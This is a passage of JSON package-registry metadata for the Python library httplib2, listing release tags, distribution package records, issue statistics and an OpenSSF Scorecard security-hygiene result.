@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T07:23:52.287Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.httplib2?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python311Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5052,"html_url":null,"role":null,"created_at":"2026-03-03T19:23:54.564Z","updated_at":"2026-03-03T19:23:54.564Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3380},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-08-25T05:04:34.674Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":6133464,"name":"py2-httplib2","ecosystem":"alpine","description":"A Python HTTP client library (for python2)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2017-04-21T07:55:39.000Z","latest_release_published_at":"2017-04-21T07:55:39.000Z","latest_release_number":"0.10.3-r0","last_synced_at":"2026-03-10T13:08:33.621Z","created_at":"2023-01-31T22:15:27.296Z","updated_at":"2026-08-22T07:44:46.353Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.6/main/x86_64/py2-httplib2","install_command":"apk add py2-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1